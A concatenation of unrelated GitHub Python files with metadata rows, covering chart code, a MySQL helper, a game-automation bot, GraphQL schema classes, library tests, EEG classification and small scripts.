energy_investment_macro = self.get_sosdisc_inputs(
'energy_investment_macro')
energy_investment = self.get_sosdisc_inputs('energy_investment')
years = list(energy_investment_macro['years'].values)
year_start = years[0]
year_end = years[len(years) - 1]
chart_name = 'Energy investments between macroeconomy output and energy input'
new_chart = TwoAxesInstanciatedChart(
'years', 'Investments', chart_name=chart_name)
energy_investment_series = InstanciatedSeries(
years, list(energy_investment['energy_investment'].values), 'energy investment (energy)', 'lines')
new_chart.series.append(energy_investment_series)
energy_investment_macro_series = InstanciatedSeries(
years, list(energy_investment_macro['energy_investment'].values), 'energy_investment (macroeconomy)', 'lines')
new_chart.series.append(energy_investment_macro_series)
instanciated_charts.append(new_chart)
norm = self.get_sosdisc_outputs('diff_norm')
chart_name = 'Differences between energy investments'
new_chart = TwoAxesInstanciatedChart(
'years', 'Differences of investments', chart_name=chart_name)
energy_investment_series = InstanciatedSeries(
years, list(energy_investment_macro['energy_investment'].values - energy_investment['energy_investment'].values), '', 'lines')
new_chart.series.append(energy_investment_series)
instanciated_charts.append(new_chart)
return instanciated_charts
| os-climate/witness-core | climateeconomics/sos_wrapping/sos_wrapping_witness/invest_discipline.py | invest_discipline.py | py | 6,662 | python | en | code | 7 | github-code | 36 |
74601336743 | import mysql.connector
from enc_dec import *
# MySQL 연결 설정
config = {
}
def upsert_db(file_id, share_doc_url):
# MySQL 연결
conn = mysql.connector.connect(**config)
cursor = conn.cursor()
# 조회할 데이터
file_id_to_search = file_id # 조회할 파일 ID에 맞게 수정
# 데이터 조회 쿼리
select_query = "SELECT * FROM share_doc WHERE file_id = %s"
# 데이터 삽입 쿼리
insert_query = "INSERT INTO share_doc (file_id, share_doc_url) VALUES (%s, %s)"
# 데이터 업데이트 쿼리
update_query = "UPDATE share_doc SET share_doc_url = %s, uptdate=now() WHERE file_id = %s"
# 데이터베이스에서 데이터 조회
cursor.execute(select_query, (file_id_to_search,))
existing_data = cursor.fetchone()
if existing_data:
# 데이터가 존재하는 경우 업데이트
new_share_data = share_doc_url # 업데이트할 데이터에 맞게 수정
cursor.execute(update_query, (new_share_data, file_id_to_search))
conn.commit()
print(f"데이터가 업데이트되었습니다. (file_id: {file_id_to_search})")
else:
# 데이터가 존재하지 않는 경우 삽입
share_data_to_insert = share_doc_url # 삽입할 데이터에 맞게 수정
cursor.execute(insert_query, (file_id_to_search, share_data_to_insert))
conn.commit()
print(f"데이터가 삽입되었습니다. (file_id: {file_id_to_search})")
# 연결 종료
cursor.close()
conn.close()
def delete_db(file_id):
# MySQL 연결 설정
# MySQL 연결
conn = mysql.connector.connect(**config)
cursor = conn.cursor()
# 조회할 데이터
file_id_to_search = file_id # 조회할 파일 ID에 맞게 수정
# 데이터 조회 쿼리
#select_query = "SELECT * FROM share_doc WHERE file_id = %s"
# 데이터 업데이트 쿼리
delete_query = "DELETE FROM share_doc WHERE file_id = %s"
# 데이터베이스에서 데이터 조회
#cursor.execute(select_query, (file_id_to_search,))
#existing_data = cursor.fetchone()
#if existing_data:
# 데이터가 존재하는 경우 업데이트
cursor.execute(delete_query, (file_id_to_search,))
conn.commit()
#print(f"데이터가 삭제되었습니다. (file_id: {file_id_to_search})")
# 연결 종료
cursor.close()
conn.close()
a=''
b=''
def get_aws():
global a
global b
# MySQL 연결
conn = mysql.connector.connect(**config)
cursor = conn.cursor()
# 키 파일에서 키를 읽어옴
with open("c:/pdf/license/license.key", "rb") as key_file:
key = key_file.read()
# 조회할 데이터
file_id_to_search = key # 조회할 파일 ID에 맞게 수정
# 데이터 조회 쿼리
select_query = "SELECT * FROM awsk_mgmt WHERE enc_key = %s"
# 데이터베이스에서 데이터 조회
cursor.execute(select_query, (file_id_to_search,))
existing_data = cursor.fetchone()
#print(existing_data[1])
#print(existing_data[2])
a = get_dec_awsacckey(key, existing_data[1])
b = get_dec_awsacckey(key, existing_data[2])
empty_tuple = (a,b)
#print(a, b)
#print(existing_data.type)
# 연결 종료
cursor.close()
conn.close()
return empty_tuple
if __name__ == "__main__":
empty_tuple = get_aws()
print(empty_tuple[0])
print(empty_tuple[1]) | HanJaeWon621/docToPdf | db_insert.py | db_insert.py | py | 3,527 | python | ko | code | 0 | github-code | 36 |
24643182429 | import pyautogui
import time
# Locating the game window
pyautogui.alert('Put the mouse pointer over the top left corner of the game then press "Enter"')
TOP_LEFT = pyautogui.position()
pyautogui.alert('Put the mouse pointer over the bottom right corner of the game then press "Enter"')
BOT_RIGHT = pyautogui.position()
DIM = (BOT_RIGHT[0] - TOP_LEFT[0], BOT_RIGHT[1] - TOP_LEFT[1])
print(TOP_LEFT,BOT_RIGHT,DIM)
# Generating the positions
QSKILL = (0.3*DIM[0]+TOP_LEFT[0], 0.9*DIM[1]+TOP_LEFT[1])
WSKILL = (0.4*DIM[0]+TOP_LEFT[0], 0.9*DIM[1]+TOP_LEFT[1])
ESKILL = (0.5*DIM[0]+TOP_LEFT[0], 0.9*DIM[1]+TOP_LEFT[1])
RSKILL = (0.6*DIM[0]+TOP_LEFT[0], 0.9*DIM[1]+TOP_LEFT[1])
SKILLS = [QSKILL,WSKILL,ESKILL,RSKILL]
SLOTZ = [[( (0.1+(i*0.07))*DIM[0]+TOP_LEFT[0], (0.26+(j*0.125))*DIM[1]+TOP_LEFT[1] )for i in range(5)]for j in range(6)]
SLOTS = [None,]
for line in SLOTZ:
SLOTS += line
# Tool functions
def use(slot, chest = False):
pyautogui.moveTo(SLOTS[slot][0], SLOTS[slot][1])
time.sleep(.1)
pyautogui.click()
pyautogui.moveRel(0.194*DIM[0], 0.185*DIM[1])
time.sleep(.1)
pyautogui.click()
if chest :
pyautogui.moveTo(0.7*DIM[0]+TOP_LEFT[0], 0.5*DIM[1]+TOP_LEFT[1])
time.sleep(.4)
pyautogui.click()
def sell(slot):
pyautogui.click(SLOTS[slot][0], SLOTS[slot][1])
time.sleep(.4)
pos= pyautogui.locateCenterOnScreen('sell_button.png', region=(SLOTS[slot][0], SLOTS[slot][1], DIM[0]/4, DIM[1]/2), grayscale=True)
print(pos)
pyautogui.click(pos[0],pos[1])
def equip(slot):
pyautogui.moveTo(SLOTS[slot][0], SLOTS[slot][1])
time.sleep(.1)
pyautogui.click()
pyautogui.moveRel(0.192*DIM[0], 0.198*DIM[1])
time.sleep(.1)
pyautogui.click()
def open_chest(slot, n):
for i in range(n):
use(slot, chest=True)
running = True
while running :
userinput = pyautogui.prompt(text = '1 - Open Chests \n2 - Sell items\n 9 - Quit', title = 'What do you want to do ?')
if userinput == '1':
i = pyautogui.prompt(text='Print the slot number (1 to 30) of the chest followed by the number of chests to open. Example : 5 20').split()
open_chest(int(i[0]), int(i[1]))
elif userinput == '2':
pyautogui.alert('Put the mouse pointer over the "SELL" button then press "Enter"')
pos = pyautogui.position()
pyautogui.screenshot('sell_button.png', region=(pos[0],pos[1], 100,50))
i = pyautogui.prompt(text='Write the starting and end slot (inclusive) of the items you want to sell, EVERYTHING in between will be sold !').split()
start, end = int(i[0]), int(i[1])
for slot in range(start, end+1):
sell(slot)
time.sleep(.1)
else :
running = False | Furrane/voxelbot | main.py | main.py | py | 2,768 | python | en | code | 0 | github-code | 36 |
74059611623 | from configs import ssd300 as cfg
import torch
import torchvision.transforms as transforms
def base_transform(size):
transform = transforms.Compose([
transforms.Resize(size),
transforms.ToTensor()
])
return transform
class BaseTransform:
def __init__(self, size, mean):
self.size = size
def __call__(self, image, boxes=None, labels=None):
return base_transform(self.size), boxes, labels
class VOCAnnotationTransform(object):
"""Transforms a VOC annotation into a Tensor of bbox coords and label index
Initilized with a dictionary lookup of classnames to indexes
Arguments:
class_to_ind (dict, optional): dictionary lookup of classnames -> indexes
(default: alphabetic indexing of VOC's 20 classes)
keep_difficult (bool, optional): keep difficult instances or not
(default: False)
height (int): height
width (int): width
"""
def __init__(self, class_to_ind=None, keep_difficult=False):
self.class_to_ind = class_to_ind or dict(
zip(cfg.VOC_CLASSES, range(len(cfg.VOC_CLASSES))))
self.keep_difficult = keep_difficult
def __call__(self, target, width, height):
"""
Arguments:
target (annotation) : the target annotation to be made usable
will be an ET.Element
Returns:
a list containing lists of bounding boxes [bbox coords, class name]
"""
res = []
for obj in target.iter('object'):
difficult = int(obj.find('difficult').text) == 1
if not self.keep_difficult and difficult:
continue
name = obj.find('name').text.lower().strip()
bbox = obj.find('bndbox')
pts = ['xmin', 'ymin', 'xmax', 'ymax']
bndbox = []
for i, pt in enumerate(pts):
cur_pt = int(bbox.find(pt).text) - 1
# scale height or width
cur_pt = cur_pt / width if i % 2 == 0 else cur_pt / height
bndbox.append(cur_pt)
label_idx = self.class_to_ind[name]
bndbox.append(label_idx)
res += [bndbox] # [xmin, ymin, xmax, ymax, label_ind]
# img_id = target.find('filename').text[:-4]
return res # [[xmin, ymin, xmax, ymax, label_ind], ... ]
| alswlsghd320/SSD_pytorch | datasets/transforms.py | transforms.py | py | 2,372 | python | en | code | 1 | github-code | 36 |
40126491559 | import json
from typing import Any, Dict, List, Optional, Set
from clairvoyance.entities import GraphQLPrimitive
from clairvoyance.entities.context import log
from clairvoyance.entities.primitives import GraphQLKind
class Schema:
"""Host of the introspection data."""
def __init__(
self,
query_type: str = None,
mutation_type: str = None,
subscription_type: str = None,
schema: Dict[str, Any] = None,
):
if schema:
self._schema = {
'directives': schema['data']['__schema']['directives'],
'mutationType': schema['data']['__schema']['mutationType'],
'queryType': schema['data']['__schema']['queryType'],
'subscriptionType': schema['data']['__schema']['subscriptionType'],
'types': [],
}
self.types = {}
for t in schema['data']['__schema']['types']:
typ = Type.from_json(t)
self.types[typ.name] = typ
else:
self.query_type = {'name': query_type} if query_type else None
self.mutation_type = {'name': mutation_type} if mutation_type else None
self.subscription_type = ({'name': subscription_type} if subscription_type else None)
self._schema = {
'directives': [],
'queryType': self.query_type,
'mutationType': self.mutation_type,
'subscriptionType': self.subscription_type,
'types': [],
}
self.types = {
GraphQLPrimitive.STRING: Type(
name=GraphQLPrimitive.STRING,
kind=GraphQLKind.SCALAR,
),
GraphQLPrimitive.ID: Type(
name=GraphQLPrimitive.ID,
kind=GraphQLKind.SCALAR,
),
}
if query_type:
self.add_type(query_type, 'OBJECT')
if mutation_type:
self.add_type(mutation_type, 'OBJECT')
if subscription_type:
self.add_type(subscription_type, 'OBJECT')
# Adds type to schema if it's not exists already
def add_type(
self,
name: str,
kind: str,
) -> None:
"""Adds type to schema if it's not exists already."""
if name not in self.types:
typ = Type(name=name, kind=kind)
self.types[name] = typ
def __repr__(self) -> str:
"""String representation of the schema."""
schema = {'data': {'__schema': self._schema}}
for t in self.types.values():
schema['data']['__schema']['types'].append(t.to_json())
output = json.dumps(schema, indent=4, sort_keys=True)
return output
def get_path_from_root(
self,
name: str,
) -> List[str]:
"""Getting path starting from root.
The algorigthm explores the schema in a DFS manner. It uses a set to keep track of visited nodes, and a list to keep track of the path. Keeping track of
the visited nodes is necessary to avoid infinite loops (ie. recursions in the schema). If a full iteration over the types is made without finding a
match, it means that the schema is not connected, and the path cannot be found.
"""
log().debug(f'Entered get_path_from_root({name})')
path_from_root: List[str] = []
if name not in self.types:
raise Exception(f'Type \'{name}\' not in schema!')
roots = [
self._schema['queryType']['name'] if self._schema['queryType'] else '',
self._schema['mutationType']['name'] if self._schema['mutationType'] else '',
self._schema['subscriptionType']['name'] if self._schema['subscriptionType'] else '',
]
roots = [r for r in roots if r]
visited = set()
initial_name = name
while name not in roots:
found = False
for t in self.types.values():
for f in t.fields:
key = f'{t.name}.{f.name}'
if key in visited:
continue
if f.type.name == name:
path_from_root.insert(0, f.name)
visited.add(key)
name = t.name
found = True
if not found:
log().debug('get_path_from_root: Ran an iteration with no matches found')
raise Exception(f'Could not find path from root to \'{initial_name}\' \nCurrent path: {path_from_root}')
# Prepend queryType or mutationType
path_from_root.insert(0, name)
return path_from_root
def get_type_without_fields(
self,
ignored: Set[str] = None,
) -> str:
"""Gets the type without a field."""
ignored = ignored or set()
for t in self.types.values():
if not t.fields and t.name not in ignored and t.kind != GraphQLKind.INPUT_OBJECT:
return t.name
return ''
def convert_path_to_document(
self,
path: List[str],
) -> str:
"""Converts a path to document."""
log().debug(f'Entered convert_path_to_document({path})')
doc = 'FUZZ'
while len(path) > 1:
doc = f'{path.pop()} {{ {doc} }}'
if self._schema['queryType'] and path[0] == self._schema['queryType']['name']:
doc = f'query {{ {doc} }}'
elif self._schema['mutationType'] and path[0] == self._schema['mutationType']['name']:
doc = f'mutation {{ {doc} }}'
elif self._schema['subscriptionType'] and path[0] == self._schema['subscriptionType']['name']:
doc = f'subscription {{ {doc} }}'
else:
raise Exception('Unknown operation type')
return doc
class TypeRef:
def __init__(
self,
name: str,
kind: str,
is_list: bool = False,
non_null_item: bool = False,
non_null: bool = False,
) -> None:
if not is_list and non_null_item:
raise Exception('elements can\'t be NON_NULL if TypeRef is not LIST')
self.name = name
self.kind = kind
self.is_list = is_list
self.non_null = non_null
self.list = self.is_list
self.non_null_item = non_null_item
def __eq__(self, other: Any) -> bool:
if isinstance(other, TypeRef):
for key, attr in self.__dict__.items():
if attr != other.__dict__[key]:
return False
return True
return False
def __str__(self) -> str:
return str(self.__dict__)
def to_json(self) -> Dict[str, Any]:
j: Dict[str, Any] = {'kind': self.kind, 'name': self.name, 'ofType': None}
if self.non_null_item:
j = {'kind': GraphQLKind.NON_NULL, 'name': None, 'ofType': j}
if self.list:
j = {'kind': GraphQLKind.LIST, 'name': None, 'ofType': j}
if self.non_null:
j = {'kind': GraphQLKind.NON_NULL, 'name': None, 'ofType': j}
return j
class InputValue:
def __init__(
self,
name: str,
typ: TypeRef,
) -> None:
self.name = name
self.type = typ
def __str__(self) -> str:
return f'{{ \'name\': {self.name}, \'type\': {str(self.type)} }}'
def to_json(self) -> dict:
return {
'defaultValue': None,
'description': None,
'name': self.name,
'type': self.type.to_json(),
}
@classmethod
def from_json(
cls,
_json: Dict[str, Any],
) -> 'InputValue':
name = _json['name']
typ = field_or_arg_type_from_json(_json['type'])
return cls(
name=name,
typ=typ,
)
def field_or_arg_type_from_json(_json: Dict[str, Any]) -> 'TypeRef':
typ = None
if _json['kind'] not in [GraphQLKind.NON_NULL, GraphQLKind.LIST]:
typ = TypeRef(
name=_json['name'],
kind=_json['kind'],
)
elif not _json['ofType']['ofType']:
actual_type = _json['ofType']
if _json['kind'] == GraphQLKind.NON_NULL:
typ = TypeRef(
name=actual_type['name'],
kind=actual_type['kind'],
non_null=True,
)
elif _json['kind'] == GraphQLKind.LIST:
typ = TypeRef(
name=actual_type['name'],
kind=actual_type['kind'],
is_list=True,
)
else:
raise Exception(f'Unexpected type.kind: {_json["kind"]}')
elif not _json['ofType']['ofType']['ofType']:
actual_type = _json['ofType']['ofType']
if _json['kind'] == GraphQLKind.NON_NULL:
typ = TypeRef(
actual_type['name'],
actual_type['kind'],
True,
False,
True,
)
elif _json['kind'] == GraphQLKind.LIST:
typ = TypeRef(
name=actual_type['name'],
kind=actual_type['kind'],
is_list=True,
non_null_item=True,
)
else:
raise Exception(f'Unexpected type.kind: {_json["kind"]}')
elif not _json['ofType']['ofType']['ofType']['ofType']:
actual_type = _json['ofType']['ofType']['ofType']
typ = TypeRef(
name=actual_type['name'],
kind=actual_type['kind'],
is_list=True,
non_null_item=True,
non_null=True,
)
else:
raise Exception('Invalid field or arg (too many \'ofType\')')
return typ
class Field:
def __init__(
self,
name: str,
typeref: Optional[TypeRef],
args: List[InputValue] = None,
):
if not typeref:
raise Exception(f'Can\'t create {name} Field from {typeref} TypeRef.')
self.name = name
self.type = typeref
self.args = args or []
def to_json(self) -> dict:
return {
'args': [a.to_json() for a in self.args],
'deprecationReason': None,
'description': None,
'isDeprecated': False,
'name': self.name,
'type': self.type.to_json(),
}
@classmethod
def from_json(cls, _json: Dict[str, Any]) -> 'Field':
name = _json['name']
typ = field_or_arg_type_from_json(_json['type'])
args = []
for a in _json['args']:
args.append(InputValue.from_json(a))
return cls(name, typ, args)
class Type:
def __init__(
self,
name: str = '',
kind: str = '',
fields: List[Field] = None,
):
self.name = name
self.kind = kind
self.fields: List[Field] = fields or []
def to_json(self) -> Dict[str, Any]:
# dirty hack
if not self.fields:
field_typeref = TypeRef(
name=GraphQLPrimitive.STRING,
kind=GraphQLKind.SCALAR,
)
dummy = Field('dummy', field_typeref)
self.fields.append(dummy)
output: Dict[str, Any] = {
'description': None,
'enumValues': None,
'interfaces': [],
'kind': self.kind,
'name': self.name,
'possibleTypes': None,
}
if self.kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE]:
output['fields'] = [f.to_json() for f in self.fields]
output['inputFields'] = None
elif self.kind == GraphQLKind.INPUT_OBJECT:
output['fields'] = None
output['inputFields'] = [f.to_json() for f in self.fields]
return output
@classmethod
def from_json(
cls,
_json: Dict[str, Any],
) -> 'Type':
name = _json['name']
kind = _json['kind']
fields = []
if kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE, GraphQLKind.INPUT_OBJECT]:
fields_field = ''
if kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE]:
fields_field = 'fields'
elif kind == GraphQLKind.INPUT_OBJECT:
fields_field = 'inputFields'
for f in _json[fields_field]:
# Don't add dummy fields!
if f['name'] == 'dummy':
continue
fields.append(Field.from_json(f))
return cls(
name=name,
kind=kind,
fields=fields,
)
| nikitastupin/clairvoyance | clairvoyance/graphql.py | graphql.py | py | 12,718 | python | en | code | 785 | github-code | 36 |
36963468353 | import setuptools
with open("README.md") as fh:
long_description = fh.read()
setuptools.setup(
name="pysqueezebox",
version="0.7.1",
license="apache-2.0",
author="Raj Laud",
author_email="raj.laud@gmail.com",
description="Asynchronous library to control Logitech Media Server",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/rajlaud/pysqueezebox",
packages=setuptools.find_packages(),
python_requires=">=3.6",
install_requires=["aiohttp", "async-timeout"],
)
| rajlaud/pysqueezebox | setup.py | setup.py | py | 572 | python | en | code | 10 | github-code | 36 |
17796457144 | from __future__ import absolute_import, division, print_function, unicode_literals
import uuid
from contextlib import contextmanager
from pants.backend.codegen.thrift.java.java_thrift_library import JavaThriftLibrary
from pants.backend.codegen.thrift.java.thrift_defaults import ThriftDefaults
from pants.build_graph.target import Target
from pants_test.test_base import TestBase
class TestThriftDefaults(TestBase):
def create_thrift_defaults(self, **options):
self.context(for_subsystems=[ThriftDefaults], options={
ThriftDefaults.options_scope: options
})
return ThriftDefaults.global_instance()
@contextmanager
def invalid_fixtures(self):
target = self.make_target(spec='not_java_thift_library_{}'.format(uuid.uuid4()),
target_type=Target)
thrift_defaults = self.create_thrift_defaults()
with self.assertRaises(ValueError):
yield thrift_defaults, target
def test_compiler_invalid(self):
with self.invalid_fixtures() as (thrift_defaults, target):
thrift_defaults.compiler(target)
def test_language_invalid(self):
with self.invalid_fixtures() as (thrift_defaults, target):
thrift_defaults.language(target)
def create_thrift_library(self, **kwargs):
return self.make_target(spec='java_thift_library_{}'.format(uuid.uuid4()),
target_type=JavaThriftLibrary,
**kwargs)
def test_compiler(self):
thrift_defaults = self.create_thrift_defaults(compiler='thrift')
self.assertEqual('thrift', thrift_defaults.compiler(self.create_thrift_library()))
self.assertEqual('scrooge',
thrift_defaults.compiler(self.create_thrift_library(compiler='scrooge')))
def test_language(self):
thrift_defaults = self.create_thrift_defaults(language='java')
self.assertEqual('java', thrift_defaults.language(self.create_thrift_library()))
self.assertEqual('scala',
thrift_defaults.language(self.create_thrift_library(language='scala')))
| fakeNetflix/twitter-repo-pants | tests/python/pants_test/backend/codegen/thrift/java/test_thrift_defaults.py | test_thrift_defaults.py | py | 2,046 | python | en | code | 0 | github-code | 36 |
36955645899 | import os
import helper, wiredtiger, wttest
from wtscenario import make_scenarios
# test_prefetch01.py
# Test basic functionality of the prefetch configuration.
class test_prefetch01(wttest.WiredTigerTestCase):
new_dir = 'new.dir'
conn_avail = [
('available', dict(available=True)),
('not-available', dict(available=False))
]
conn_default = [
('default-off', dict(default=True)),
('default-on', dict(default=False)),
]
session_cfg = [
('no-config', dict(scenario='no-config', enabled=False, has_config=False)),
('enabled', dict(scenario='enabled', enabled=True, has_config=True)),
('not-enabled', dict(scenario='not-enabled', enabled=False, has_config=True)),
]
scenarios = make_scenarios(conn_avail, conn_default, session_cfg)
def test_prefetch_config(self):
conn_cfg = 'prefetch=(available=%s,default=%s)' % (str(self.available).lower(), str(self.default).lower())
session_cfg = ''
msg = '/pre-fetching cannot be enabled/'
if self.has_config:
session_cfg = 'prefetch=(enabled=%s)' % (str(self.enabled).lower())
os.mkdir(self.new_dir)
helper.copy_wiredtiger_home(self, '.', self.new_dir)
if not self.available and self.default:
# Test that we can't enable a connection's sessions to have pre-fetching when
# pre-fetching is configured as unavailable.
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda: self.wiredtiger_open(self.new_dir, conn_cfg), msg)
elif not self.available and self.enabled:
# Test that we can't enable a specific session to have pre-fetching turned on
# if pre-fetching is configured as unavailable.
new_conn = self.wiredtiger_open(self.new_dir, conn_cfg)
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda: new_conn.open_session(session_cfg), msg)
else:
new_conn = self.wiredtiger_open(self.new_dir, conn_cfg)
new_session = new_conn.open_session(session_cfg)
self.assertEqual(new_session.close(), 0)
if __name__ == '__main__':
wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_prefetch01.py | test_prefetch01.py | py | 2,236 | python | en | code | 24,670 | github-code | 36 |
23195728404 | from django.http import HttpResponse
from django.shortcuts import render
from config import settings
#from email.message import EmailMessage
from django.core.mail import EmailMessage
# Create your views here.
def home(request):
return render(request,"index.html")
def send_email(request):
if request.method=='POST':
name=request.POST['name']
sender_email=request.POST['email']
msg=request.POST['msg']
phone=request.POST['phone']
email=EmailMessage(
f'Xabar qoldiruvchi: {sender_email}',
f'Ismi: {name}\nXabari: {msg}\nTel raqami: {phone}',
settings.EMAIL_HOST_USER,
[sender_email]
)
email.fail_silently=True
email.send()
return HttpResponse("Muvaffaqiyatli jo'natildi")
else:
return HttpResponse("Jo'natilmadi") | utkir-dev/Send-Email | smtp/views.py | views.py | py | 855 | python | en | code | 0 | github-code | 36 |
5603935400 | from django.urls import path
from . import views
app_name = 'base'
urlpatterns = [
path('home/', views.landing_page, name='home'),
path('school_registered/', views.school_list_page, name='school_registered'),
path('contact_us/', views.contact_us_page, name='contact_us'),
]
| zuri-training/Project-My-Debtors-Team-38 | SDM/base/urls.py | urls.py | py | 293 | python | en | code | 2 | github-code | 36 |
4872107449 | import pyriemann
import mne
from mne.io import read_raw_gdf
import scipy
from scipy import signal
from scipy.signal import butter, filtfilt, sosfiltfilt
import os
import pickle
import sklearn
import seaborn as sns
import matplotlib
import matplotlib as mpl
mpl.use('Qt5Agg') # for using pyplot (pip install pyqt5)
import matplotlib.pyplot as plt
import numpy as np
# Bandpass filtering
def butter_lowpass_filter(data, lowcut, fs, order):
nyq = fs/2
low = lowcut/nyq
b, a = butter(order, low, btype='low')
# demean before filtering
meandat = np.mean(data, axis=1)
data = data - meandat[:, np.newaxis]
y = filtfilt(b, a, data) # zero-phase filter # data: [ch x time]
return y
def butter_highpass_filter(data, highcut, fs, order):
nyq = fs/2
high = highcut/nyq
b, a = butter(order, high, btype='high')
# demean before filtering
meandat = np.mean(data, axis=1)
data = data - meandat[:, np.newaxis]
y = filtfilt(b, a, data) # zero-phase filter # data: [ch x time]
return y
def butter_bandpass_filter(data, lowcut, highcut, fs, order):
nyq = fs/2
low = lowcut/nyq
high = highcut/nyq
sos = butter(order, [low, high], btype='band', output='sos')
# demean before filtering
meandat = np.mean(data, axis=1)
data = data - meandat[:, np.newaxis]
y = sosfiltfilt(sos, data) # zero-phase filter # data: [ch x time]
# specify pandlen to make the result the same as Matlab filtfilt()
return y
# User parameters
# 769, 770, 774, 780 - left, right, up (tongue), down (feet)
#markers = [769, 770, 780, 774]
#markers_arr = {769:0, 770:1, 780:2, 774:3}
markers = [769, 770] # left, right
markers_arr = {769:1, 770:2}
# for g.tec EEG
nCh = 16
fs = 512
frame = [0.5, 3]
nTime = int((frame[1]-frame[0]) * 512)
#nTrial = 20
nClass = len(markers)
bp = [8, 30]
ch_names = ['FP1', 'FP2', 'F4', 'Fz', 'F3', 'T7', 'C3', 'Cz', 'C4', 'T8', 'P4', 'Pz', 'P3', 'O1', 'Oz', 'O2']
roi = ['F4', 'Fz', 'F3', 'C3', 'Cz', 'C4', 'P4', 'Pz', 'P3']
roi_id = np.zeros((len(roi)), dtype=np.int64)
for i in range(len(roi)):
roi_id[i] = ch_names.index(roi[i]) # use roi_id
nSub = 3
train_EEG = np.array([]).reshape(0, nCh, nTime)
train_labels = []
for i in range(4):
fname = './data/s%02d/MI_run%02d.gdf' % (nSub, (i+1))
print(fname)
eeg = read_raw_gdf(fname)
ano_types = eeg.annotations.description.astype(int) # markers
ano_latency = np.round(eeg.annotations.onset, 4)
eeg_times = np.round(eeg.times, 4)
dat = eeg.get_data() * 1000000
ch_names = eeg.ch_names
merge_EEG = np.array([]).reshape(nCh, nTime, 0)
for cur_markers in markers:
event_indicies = np.argwhere(ano_types == cur_markers)
event_latencies = ano_latency[event_indicies]
print('current marker is '+str(cur_markers))
n_trial = 0
epoched_EEG = np.array([]).reshape(nCh, nTime, 0)
tmp_labels = markers_arr[cur_markers] * np.ones((len(event_latencies)))
train_labels = np.append(train_labels, tmp_labels)
for cur_latency in event_latencies:
m_onset = np.where(eeg_times == cur_latency)[0][0]
tmp_epoch = dat[:, m_onset + int(frame[0]*fs):m_onset + int(frame[1]*fs)]
# epoch-level bandpass filtering
tmp_epoch = butter_bandpass_filter(tmp_epoch, bp[0], bp[1], fs, 4)
epoched_EEG = np.dstack((epoched_EEG, tmp_epoch))
n_trial = n_trial + 1
merge_EEG = np.dstack((merge_EEG, epoched_EEG))
merge_EEG = np.transpose(merge_EEG, (2, 0, 1)) # now [trial x ch x time]
train_EEG = np.vstack((train_EEG, merge_EEG))
cov_train = pyriemann.estimation.Covariances().fit_transform(train_EEG[:, roi_id, :])
print(cov_train.shape)
print(train_labels.shape)
mdm = pyriemann.classification.MDM()
mdm.metric = 'Riemann'
mdm.fit(cov_train, train_labels) # training
mdm_train_acc = np.sum(mdm.predict(cov_train) == train_labels) / len(train_labels) # train - meaningless
print('training accuracy is', np.round(mdm_train_acc,4))
trained = {'COV':cov_train, 'Labels':train_labels}
fname_user = input('Enter model name: ')
fname_model = './data/s%02d/%s.pkl' % (nSub, fname_user)
print(fname_model, 'saved.')
out_file = open(fname_model, 'wb')
pickle.dump(trained, out_file)
out_file.close()
| Kyungho-Won/PyRiemann-with-OpenViBE | train_MI_Riemann.py | train_MI_Riemann.py | py | 4,441 | python | en | code | 0 | github-code | 36 |
7789477007 | #1st example
'''class Base:
def Fun():
print("Hello World")
class Derive(Base):
def AnotherFun():
print("Bye World")
obj=Derive()
obj.Fun()
obj.AnotherFun()'''
#2nd example
#-----------------------------------
class Bank:
acno=0
name=''
branch=''
balance=0.0
def Input(self):
acno=int(input("Enter Account Number"))
name=input("Enter your name")
branch=input("Enter your Branch Name")
balance=float(input("Enter your Bank Balance"))
def Output(self):
print("Account Number : ", self.acno)
print("Name : ", self.name)
print("Branch : ", self.branch)
print("Bank Balance : ", self.balance)
def Fun(self):
print("test")
class BankV1(Bank):
aadhar=0
def Input(self): #Overriding
Bank.Input(self)
self.aadhar=input("Enter Aadhar Number : ")
def Output(self):
Bank.Output(self) #Overriding
print("Your Aadhar Number is : ", self.aadhar)
c=BankV1()
c.Input()
c.Output()
| diamondzxd/Python-classes | 07th session/1.py | 1.py | py | 1,099 | python | en | code | 0 | github-code | 36 |
35387023504 | #!/usr/bin/env python3
import os
from sys import argv, exit
from pathlib import Path
import vertex_cover_lib as vcl
EXACT_LIMIT = 80
def main(num_vertices, num_edges, seed, weighted, approx, file_full_extension):
# Automatic cast:
num_vertices = int(num_vertices)
num_edges = int(num_edges)
seed = int(seed)
weighted = int(weighted)
approx = int(approx)
# Generate graph instance
instance = vcl.instances_generator(1, 1, num_vertices, num_edges, seed, weighted)[0]
#if num_vertices <= EXACT_LIMIT:
if not approx:
if not weighted:
size, sol = vcl.calculate_minimum_vc(instance['graph'])
else:
sol, size, weight = vcl.calculate_minimum_weight_vc(instance['graph'])
instance['risp_weight'] = weight
instance['exact_sol'] = True
instance['risp'] = sol
else:
if not weighted:
size, sol, max_matching = vcl.calculate_approx_vc(instance['graph'])
instance['exact_sol'] = False
instance['risp'] = f'{sol}\n{max_matching}'
#instance['risp'] = max_matching
else:
sol, size, weight = vcl.calculate_weighted_approx_vc(instance['graph'])
instance['exact_sol'] = False
instance['risp'] = sol
instance['risp_weight'] = weight
# Generate selected output
print(vcl.instance_to_str(instance, vcl.file_extension_to_format_name(file_full_extension)))
if __name__ == "__main__":
from sys import argv
#assert len(argv) == 5, 'Miss arguments'
main(argv[1], argv[2], argv[3], argv[4], argv[5], argv[6])
exit(0)
| romeorizzi/TALight | example_problems/tutorial/vertex_cover/gen/randgen_1_basic.py | randgen_1_basic.py | py | 1,595 | python | en | code | 11 | github-code | 36 |
34301681133 |
import matplotlib
matplotlib.use('TKAgg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from dateutil import parser
import numpy as np
import pandas as pd
import datetime
df_ferrara = pd.read_csv('WeatherData/ferrara_270615.csv')
df_milano = pd.read_csv('WeatherData/milano_270615.csv')
df_mantova = pd.read_csv('WeatherData/mantova_270615.csv')
df_ravenna = pd.read_csv('WeatherData/ravenna_270615.csv')
df_torino = pd.read_csv('WeatherData/torino_270615.csv')
df_asti = pd.read_csv('WeatherData/asti_270615.csv')
df_bologna = pd.read_csv('WeatherData/bologna_270615.csv')
df_piacenza = pd.read_csv('WeatherData/piacenza_270615.csv')
